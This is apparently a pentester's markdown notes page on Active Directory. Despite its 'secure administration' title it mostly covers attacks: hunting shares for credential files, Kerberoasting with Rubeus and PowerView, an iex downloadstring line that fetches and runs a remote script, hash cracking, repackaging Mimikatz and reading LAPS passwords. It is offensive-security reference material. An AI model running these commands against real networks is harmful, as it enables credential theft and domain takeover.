# [Secure Active Directory Settings and Windows Administration](/Active%20Directory/secure_ad_administrator.md)

Some tips on how to securely administrate an Active Directory environment

[AD mindmap](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg)

# Methodology/Approach
These references represent quite well what the general approach is nowadays. 

[Attacking Active Directory: 0 to 0.9 By Eloy Pérez González](https://eloypgz.org/posts/attacking_ad/)

[Red Teamers Can Learn Secrets by Purple Teaming](https://www.alienvault.com/blogs/security-essentials/red-teamers-can-learn-secrets-by-purple-teaming?utm_medium=Social&utm_source=Twitter&utm_content=Awareness)

[Hunt for the Domain Admin (DA)](https://myexploit.wordpress.com/hunt-for-the-domain-admin-da/)

[Compromising Domain Admin in Internal Pentest](http://c0d3xpl0it.blogspot.cz/2017/02/compromising-domain-admin-in-internal-pentest.html)

[Learning from the field : Active Directory Recon and Administrative shells](http://bitvijays.github.io/LFFRemoteCodeExec.html)

[Quick methodology from a **Linux box**](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)

[Active Directory Methodology - HackTricks](https://book.hacktricks.xyz/windows/active-directory-methodology)

[Active Directory Attacks - PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)

[AD-Attack-Defense](https://github.com/infosecn1nja/AD-Attack-Defense)

[Active Directory Cheat Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet)

[TRIMARC - Securing Active Directory: Performing an Active Directory Security Review](https://www.hub.trimarcsecurity.com/post/securing-active-directory-performing-an-active-directory-security-review)

# [Reconaissance](Active%20Directory/reconnaissance.md)


# Authentication Protocol
## Kerberos
[How to attack Kerberos?](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)

[Kerbrute - A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication](https://github.com/ropnop/kerbrute)

# Privilege Escalation
## Shares

Check Access Control List of a share

    Get-Acl -path \\HOST\SHARE | fl



**(PowerView) Find-ShareDomain**


Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned.


**(PowerView) Find-InterestingDomainShareFile**

`Find-InterestingDomainShareFile -ComputerDomain DOMAIN -Server DC -include @('*passw*', '*sensitive*', '*administrator*', '*administrador*', '*administrateur*', '*login*', '*logon*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config', '*.ps1', '*.bat', '*.vbs', '*clave*', '*contrasena*', '*contraseña*', 'WinSCP.ini', '*.kdbx', '*.cert', '*.pem', '*pwd*', '*heslo*', '*.ova', '*.vhdx', '*.vhd', '*.vbe', '*.pfx', '*pass*.xls*', '*pass*.doc*', '*pass*.txt', '*admin*.txt*', '*ntds.dit*', 'SAM') | Export-csv interesting_shares_files.csv `


**Snaffler**

https://github.com/SnaffCon/Snaffler


**smbmap**

 - Intended to simplify searching for potentially sensitive data across large networks.
 - Enumerates samba share drives across an entire domain. List drives, permissions, contents,
upload/download functionality, file name auto-download pattern matching, etc.

## Kerberoasting

 - Offline brute force of password of service account within service tickets (TGS)
 - No risk of detection
 - No account lockouts
 - Invoke-Kerberoast from [PowerView (dev)](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) to collect hashes
 - Ignore Computer Accounts. Focus on user accounts used for the SPN service. They have shorter passwords
 - Use [JohnTheRipper (magnumripper)](https://github.com/magnumripper/JohnTheRipper) to crack them


### With Rubeus

If credentials are included, this would work from a non-domain-joined machine.

`Rubeus.exe kerberoast /tgtdeleg /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD /outfile:kerberoast_hashes.txt`

"/tgtdeleg" flag forces tickets to be requested with RC4 encryption. More info at https://github.com/GhostPack/Rubeus#kerberoast 


### PowerView - Invoke-Kerberoast

```
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')

Invoke-Kerberoast -Domain DOMAIN_FQDN -Server DC_NAME -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

```


From a non-domain machine:
1. Request a TGT ticket with Rubeus/Kekeo:

    Rubeus.exe asktgt /user:USERNAME /password:PASSWORD /domain:DOMAIN_FQDN /dc:DC_NAME /ptt
    
2. 

```

Invoke-Kerberoast -Domain DOMAIN_FQDN -Server DC_NAME -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

```

### Disconnected RSAT
[DRSAT](https://github.com/CCob/DRSAT)

Disconnected RSAT is a launcher for the official Group Policy Manager, Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in.


### ACL 

[ACLScanner](https://github.com/canix1/ADACLScanner)

[Microsoft Powershell Script: OU Permission Report](https://blogs.technet.microsoft.com/ashleymcglone/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download/)



### Crack the hashes

```
hashcat -m 13100 -a 0 kerberoast_hashcut_output.txt wordlist.txt

./john HASH_FILE --wordlist=/usr/share/wordlists/rockyou.txt
```

## Kerberos PreAuthentication
[Kerberos PreAuthentication](https://www.gracefulsecurity.com/kerberos-preauthentication-and-party-tricks/)

## Others:

[Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)

[Grouper: A PowerShell script for helping to find vulnerable settings in AD Group Policy](https://github.com/l0ss/Grouper)

[Exchange-AD-Privesc](https://github.com/gdedrouas/Exchange-AD-Privesc)

# GPO

Invoke-GPOZaurr - One command that makes a difference

https://evotec.xyz/the-only-command-you-will-ever-need-to-understand-and-fix-your-group-policies-gpo/

https://twitter.com/PrzemyslawKlys/status/1385132679990059010 


In order to know which OUs a GPO affects to, we can use the following PowerView function:

`Get-DomainOU -GPLink "GPO_GUID" -Domain DOMAIN_FQDN -Server DC_NAME -Credential $Cred | select-object distinguishedname `

Once you have OU you can get computers by PowerView command:

`Get-DomainComputer -SearchBase "LDAP://OU=PCs,..." ...`

**One-liner**

`Get-DomainGPO -Name "<GPO NAME>" | foreach { Get-DomainOU -GPLink $_.cn } | foreach { Get-DomainComputer -SearchBase $_.distinguishedname } | Select-Object distinguishedname `


To know the results of a set policies applied to a remote computer (or user if specified as /SCOPE USER). The command should run as a local admin of the report computer (i.e. with runas):

`gpresult.exe /s <COMPUTER> /SCOPE COMPUTER /h report.html`

[Grouper2 - Find vulnerabilities in AD Group Policy](https://github.com/l0ss/Grouper2)

[GPOZaurr](https://github.com/EvotecIT/GPOZaurr)

# Password 

[Domain Password Audit Tool (DPAT)](https://github.com/clr2of8/DPAT)



#  Persistence
[AN ACE UP THE SLEEVE: DESIGNING ACTIVE DIRECTORY DACL BACKDOORS](https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)

# AD Atributes and ACL description 

http://www.kouti.com/tables/userattributes.htm

http://www.kouti.com/tables.htm


# Browsing SYSVOL from Windows 10
If you can't access SYSVOL (File Explorer) from Windows 10 you have to set protected UNC paths http://woshub.com/cant-access-domain-sysvol-netlogon-folders/


# Tools
[BloodHound](bloodhound.md)

[Mimikatz](https://github.com/gentilkiwi/mimikatz). You gotta master this tool!

Create your own PowerShell Version of *Invoke-Mimikatz*:

- Compile Mimikatz selecting the release 'Second_Release_PowerShell' (do it for both 32 and 64 bits)
- Base64 the resulting dll with linux by using 'base64 -w 0 powerkatz.dll > base64.txt' command
- Replace the $PEBytes64 (and 32) var in Invoke-Mimikatz.ps1


[RedSnarf](https://github.com/nccgroup/redsnarf)

[GoFetch](https://github.com/GoFetchAD/GoFetch)

[Death Star](https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html)


# Defense

### LAPS

[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit)

Local Administrator Password Solution. Provides a centralized storage of secrets/passwords in AD without additional computers. You can configure which users, groups, departments, are authorized to read the passwords.
Interesting LAPS permissions:

**Access** | **Object** | **Outcome**
---- | ----- | -----
Read | ms-Mcs-AdmPwd | View the configured password
Write | ms-Mcs-AdmPwd | Reset the password
Read | Ms-Mcs-AdmPwdExpirationTime | View the LAPS password reset date

Check if LAPS is enabled within the environment by querying known fields: the expiration time is available to any domain user to view. Any computer with a set value for this paramenter has LAPS enabled.

    Get-DomainComputer | select SamAccountName, ms-mcs-AdmPwdExpirationTime, ms-mcs-AdmPwd
    
For those with computers with LAPS enabled, we can then check which objects have permissions to read its value. We an use PowerView (ACLScanner), [ADACLScanner](https://github.com/canix1/ADACLScanner) or SysInternals ADExplorer Efective Permissions.

Once we own an account that has read permissions on ms-mcs-AdmPwd, we can obtain the password:

    $usercreds = ConvertTo-SecureString 'PassW0rd!!' -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PsCredential('DOMAIN\USERNAME', $usercreds)
    Get-DomainComputer -Credentials $creds | select SamAccountName, ms-mcs-AdmPwdExpirationTime, ms-mcs-AdmPwd


http://www.harmj0y.net/blog/powershell/running-laps-with-powerview/


**Microsoft ATA**

[Introducing Microsoft Advanced Threat Analytics v1.8!](https://blogs.technet.microsoft.com/enterprisemobility/2017/07/26/introducing-microsoft-advanced-threat-analytics-v1-8/)

[ Microsoft’s Advanced Threat Analytics (ATA)](https://gallery.technet.microsoft.com/ATA-Playbook-ef0a8e38)

[Evading Microsoft ATA for Active Directory Domination](https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf)

[Week of Evading Microsoft ATA - Announcement and Day 1](http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html)


# AD Lab

https://github.com/outflanknl/Invoke-ADLabDeployer

https://github.com/OneLogicalMyth/Automated-AD-Setup

https://github.com/clong/DetectionLab

https://github.com/jaredhaight/PowerShellClassLab

https://github.com/curi0usJack/ADImporter

https://github.com/chryzsh/DarthSidious/

https://github.com/AutomatedLab/AutomatedLab

https://github.com/jaredhaight/WindowsAttackAndDefenseLab/

# Other references
I keep here some references I still need to review and I don't want to miss.

[ADEssentials](https://github.com/EvotecIT/ADEssentials)

[Active Directory Kill Chain Attack & Defense](https://github.com/infosecn1nja/AD-Attack-Defense/blob/master/README.md)

[Windows Automated Lab with Vagrant](https://github.com/dbroeglin/windows-lab)

[From mimikatz to kekeo: passing by new Microsoft Security Technologies](https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254%213316&ithint=file%2cpptx&app=PowerPoint)

[Windows Device Guard: Attack Surface, Bypasses, and Mitigations](https://onedrive.live.com/?authkey=%21AMAclyEPOHscqzE&cid=B9E47855F9345D3B&id=B9E47855F9345D3B%21698&parId=B9E47855F9345D3B%21695&o=OneUp)

[Forensics: Active Directory ACL investigation](https://blogs.technet.microsoft.com/pfesweplat/2017/01/28/forensics-active-directory-acl-investigation/)

https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/

[mindmap to pentest active directory](https://twitter.com/M4yFly/status/1306631179831894017)

[Securing Active Directory: Performing an Active Directory Security Review](https://www.hub.trimarcsecurity.com/post/securing-active-directory-performing-an-active-directory-security-review)

[A more updated version of PowerView](https://exploit.ph/powerview.html)

[Abusing Users Configured with Unconstrained Delegation](https://exploit.ph/user-constrained-delegation.html)
